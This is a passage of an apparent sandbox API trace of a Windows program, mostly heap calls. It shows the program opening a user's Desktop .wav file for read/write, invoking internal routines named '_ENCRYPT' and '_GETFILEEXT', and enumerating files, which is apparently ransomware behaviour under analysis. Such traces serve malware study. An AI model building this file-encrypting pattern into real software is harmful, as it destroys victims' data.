hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.608] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\xljsiuwe53rpslj_a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=93, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xba) returned 0x7c5448 [0031.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=93, lpWideCharStr=0x7c5448, cchWideChar=93 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav") returned 93 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c50e0 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.610] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.611] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.612] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.613] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.614] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0031.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.614] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.614] CloseHandle (hObject=0x128) returned 1 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.614] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.615] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.615] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.615] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.615] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.615] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.615] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFindFileData=0x6ae8c0 | out: 